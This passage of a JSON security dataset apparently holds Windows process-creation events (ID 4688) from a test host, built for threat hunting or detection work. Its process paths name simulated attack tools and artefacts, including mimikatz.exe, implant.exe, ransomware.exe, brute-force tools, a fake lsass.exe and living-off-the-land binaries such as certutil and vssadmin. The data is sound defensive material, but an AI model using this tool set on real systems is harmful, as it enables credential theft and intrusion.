rtsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\"],\"EventID\":[4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688],\"NewProcessId\":[\"0x1610\",\"0x1790\",\"0xcd8\",\"0x28c\",\"0x1284\",\"0xb10\",\"0x2a8\",\"0x90c\",\"0x130c\",\"0xc84\",\"0x570\",\"0x28c\",\"0xb8\",\"0xd14\",\"0x1490\",\"0x148c\",\"0x1414\",\"0x1530\",\"0x7b4\",\"0x1594\",\"0x1630\",\"0x16a0\",\"0x1694\",\"0x1658\",\"0x1740\",\"0xd14\",\"0x1094\",\"0x1270\",\"0xc10\",\"0x6ec\",\"0x1388\",\"0xc08\",\"0x364\",\"0x1338\",\"0x12fc\",\"0x1128\",\"0x13fc\",\"0x123c\",\"0x13e8\",\"0x6bc\",\"0x1254\",\"0x11b0\",\"0x1d0\",\"0x1070\",\"0x6ec\",\"0xc84\",\"0x16fc\",\"0x1700\",\"0x1728\",\"0x1738\",\"0x175c\",\"0x176c\",\"0x17a8\",\"0x17a0\",\"0x17cc\",\"0x17e8\",\"0x143c\",\"0x1064\",\"0x1434\",\"0xbb4\",\"0x1404\",\"0x148c\",\"0x1464\",\"0x14b8\",\"0x14ec\",\"0x14f0\",\"0x14e8\",\"0x1564\",\"0x155c\",\"0x1550\",\"0x690\",\"0x123c\",\"0x244\",\"0xa10\",\"0xc54\",\"0xbc8\",\"0x10cc\",\"0x1288\",\"0x3dc\",\"0x2a8\",\"0xa5c\",\"0xfc0\",\"0x10b8\",\"0x132c\",\"0x4e8\",\"0xcd8\",\"0x97c\",\"0x90c\",\"0xe68\",\"0x12fc\",\"0xc18\",\"0xbb4\",\"0x1274\",\"0x614\",\"0xd10\",\"0xbdc\",\"0x135c\",\"0x103c\",\"0x1014\",\"0xbb4\",\"0x11cc\",\"0x123c\",\"0x132c\",\"0x156c\",\"0x1580\",\"0x15a0\",\"0x15b4\",\"0x15d4\",\"0x15e8\",\"0x1608\",\"0x161c\",\"0x163c\",\"0x1650\",\"0x1670\",\"0x1684\",\"0x16a4\",\"0x16b8\",\"0x16d8\",\"0x16ec\",\"0x170c\",\"0xa08\",\"0x4e8\",\"0x240\",\"0x1250\",\"0x140c\",\"0x142c\",\"0x1448\",\"0x1450\",\"0x1458\",\"0x1498\",\"0x14ac\",\"0x14cc\",\"0x14e0\",\"0xbdc\",\"0x13a8\",\"0xa4\",\"0x1500\",\"0x1514\",\"0x1534\",\"0x154c\",\"0x1490\",\"0x1464\",\"0x142c\",\"0x14b0\",\"0x14c0\",\"0x14fc\",\"0x14f0\",\"0x14e8\",\"0x152c\",\"0x1520\",\"0x1514\",\"0x1550\",\"0x1560\",\"0x1584\",\"0x1580\",\"0x15c0\",\"0x1600\",\"0x15f0\",\"0x162c\",\"0x166c\",\"0x1660\",\"0x1658\",\"0x169c\",\"0x168c\",\"0x16c8\",\"0x1560\",\"0x158c\",\"0x15d0\",\"0x15c8\",\"0x15ec\",\"0x15e8\",\"0x1630\",\"0x1668\",\"0x1658\",\"0x1664\",\"0x16d4\",\"0x16c0\",\"0x1704\",\"0x16fc\",\"0x11cc\",\"0x99c\",\"0x11c4\",\"0xd14\",\"0xaa8\",\"0x138c\",\"0xa60\",\"0xab8\",\"0xfbc\",\"0x1380\",\"0x5cc\",\"0x16f4\",\"0x1770\",\"0x1774\",\"0x1728\",\"0x1798\",\"0x1758\",\"0x17a8\",\"0x17f8\",\"0x17cc\",\"0x1414\",\"0x28c\",\"0xc18\",\"0x1404\",\"0x147c\",\"0x1464\",\"0x14b8\",\"0x14ec\",\"0x14f0\",\"0x14e8\",\"0x1564\",\"0x155c\",\"0x15b8\",\"0x15d0\",\"0x158c\",\"0x1638\",\"0x1624\",\"0x1628\",\"0x1654\",\"0x169c\",\"0x1694\",\"0x16c4\",\"0x1724\",\"0x1744\",\"0x1758\",\"0x1778\",\"0x178c\",\"0x17ac\",\"0x17bc\",\"0x17c0\",\"0x17dc\",\"0x17e4\",\"0x1440\",\"0x1434\",\"0x1424\",\"0x123c\",\"0x240\",\"0x1040\",\"0x690\",\"0x11ac\",\"0xd04\",\"0xc18\",\"0x13e4\",\"0x10e4\",\"0x90c\",\"0xfbc\",\"0xbdc\",\"0x57c\",\"0x10fc\",\"0xd78\",\"0x1054\",\"0x12dc\",\"0xb8\",\"0x11b4\",\"0x1020\",\"0xd80\",\"0xbdc\",\"0x690\",\"0x6d4\",\"0x54c\",\"0x93c\",\"0x138c\",\"0x1258\",\"0xf94\",\"0x123c\",\"0x11e4\",\"0xa08\",\"0x125c\",\"0x10f4\",\"0x1020\",\"0x638\",\"0x10cc\",\"0x107c\",\"0x1064\",\"0x1220\",\"0x1258\",\"0xab8\",\"0xbd8\",\"0x123c\",\"0xcd8\",\"0xd14\",\"0xa10\",\"0x1298\",\"0xac4\",\"0x364\",\"0x1128\",\"0xc54\",\"0x12e8\",\"0x17fc\",\"0x17f0\",\"0x1434\",\"0x1404\",\"0x13a4\",\"0x10f4\",\"0x11e8\",\"0x364\",\"0xc08\",\"0x338\",\"0xfbc\",\"0x640\",\"0x1320\",\"0x13b0\",\"0x1388\",\"0x11c8\",\"0x544\",\"0x894\",\"0xde8\",\"0x778\",\"0x2f8\",\"0x364\",\"0x1c4\",\"0x99c\",\"0x10c8\",\"0x13e0\",\"0x1550\",\"0x15d0\",\"0x13b4\",\"0x16d0\",\"0x11a8\",\"0x244\",\"0x1050\",\"0x690\",\"0xb8\",\"0x1364\",\"0x1148\",\"0x10e0\",\"0x12fc\",\"0x5cc\",\"0x518\",\"0xf84\",\"0xd64\",\"0xc18\",\"0xb50\",\"0x10a4\",\"0x13b4\",\"0xe3c\",\"0xd64\",\"0xc18\",\"0x10e0\",\"0x108c\",\"0x28c\",\"0x11b4\",\"0xddc\",\"0xbe8\",\"0x130c\",\"0x1040\",\"0x1370\",\"0x8e4\",\"0x10fc\",\"0x1298\",\"0x7f8\",\"0xf94\",\"0xc18\",\"0xa84\",\"0x1348\",\"0xe34\",\"0x11b4\",\"0x13b4\",\"0x1148\",\"0xde8\",\"0xc08\",\"0x1338\",\"0xb8\",\"0x6d4\"],\"NewProcessName\":[\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\42424.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\1234.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\tsetup.1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\perfc.dat\",\"C:\\\\Diagnostics\\\\UserTmp\\\\sdopfjiowtbkjfnbeioruj.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\doubleextension.pdf.exe\",\"C:\\\\Windows\\\\System32\\\\vssadmin.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\dllhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\Dism.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\Temp\\\\CC563BBE-DE32-44D3-8E35-F3FC78E72E40\\\\DismHost.exe\",\"C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe\",\"C:\\\\Windows\\\\WinSxS\\\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.2602_none_7ee6020e2207416d\\\\TiWorker.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\regsvr32.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\suchost.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\certutil.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\whoami.exe\",\"C:\\\\Windows\\\\System32\\\\HOSTNAME.EXE\",\"C:\\\\Windows\\\\System32\\\\NETSTAT.EXE\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\ftp.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\dubrute.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\nlbrute.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\svchost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\smss.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\ASC_Alerttest_662jfi039n.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\wuauclt.exe\",\"C:\\\\Windows\\\\SoftwareDistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\lsass.exe\",\"C:\\\\Windows\\\\SoftwareDistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cacls.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\2840.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\a_keygen.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\bittorrent.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\ransomware.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\pcalua.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\findstr.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\odbcconf.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\odbcconf.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\SQLDumper.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\mt.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\mt.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\hd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\hd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\certutil.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\sc.exe\",\"C:\\\\Windows\\\\System32\\\\sc.exe\",\"C:\\\\Windows\\\\System32\\\\wermgr.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\Fonts\\\\csrss.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\WerFault.exe\",\"C:\\\\Windows\\\\Fonts\\\\conhost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\mimikatz.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\Fonts\\\\conhost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\regsvr32.exe\",\"C:\\\\Windows\\\\System32\\\\tasklist.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service 